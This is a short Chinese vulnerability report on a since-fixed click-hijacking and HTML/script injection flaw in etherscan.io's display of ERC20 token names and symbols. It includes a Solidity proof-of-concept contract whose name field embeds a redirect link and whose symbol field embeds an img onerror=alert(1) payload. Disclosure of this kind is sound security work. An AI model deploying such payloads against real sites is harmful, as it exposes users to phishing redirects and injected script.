etherscan點選劫持漏洞
漏洞URL:如果是Web就填寫此項
https://etherscan.io
簡要描述:漏洞說明、利用條件、危害等
部署合約代幣時,符合ERC20標準的情況下,symbol和name自定義,可嵌入a標籤覆蓋原本的標籤。
在使用者訪問點選頁面內的合約名字,可以劫持至任意網站。
需要部署ERC20標準的合約,且在訪問合約頁面之前,發起一次交易。
漏洞證明:
https://ropsten.etherscan.io/address/0x701300f2f2c171c8c7c09e0fa09d6706a4fc7cd6#tokentxns
漏洞利用程式碼:
pragma solidity ^0.4.24;
contract MyTest {
mapping(address => uint256) balances;
uint256 public totalSupply;
mapping (address => mapping (address => uint256)) allowance;
address public owner;
string public name;
string public symbol;
uint8 public decimals = 18;
event Transfer(address indexed _from, address indexed _to, uint256 _value);
function MyTest() {
name = "<a href=http://baidu.com>12321</a>";
symbol = 'ok<img src=/ onerror=alert(1)> ';
totalSupply = 100000000000000000000000000000000000;
}
function mylog(address arg0, address arg1, uint256 arg2) public {
Transfer(arg0, arg1, arg2);
}
}
修復方案:
過濾
————————————————————————————————
經與Etherscan廠商聯絡,目前已修復該漏洞